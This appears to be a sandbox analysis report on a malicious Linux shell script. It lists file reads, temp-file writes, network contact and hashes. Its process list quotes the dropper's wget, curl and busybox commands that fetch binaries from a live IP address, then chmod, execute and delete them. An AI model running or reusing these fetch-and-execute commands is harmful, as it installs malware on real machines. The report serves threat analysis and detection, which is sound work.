Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
Processes
/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh
[/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |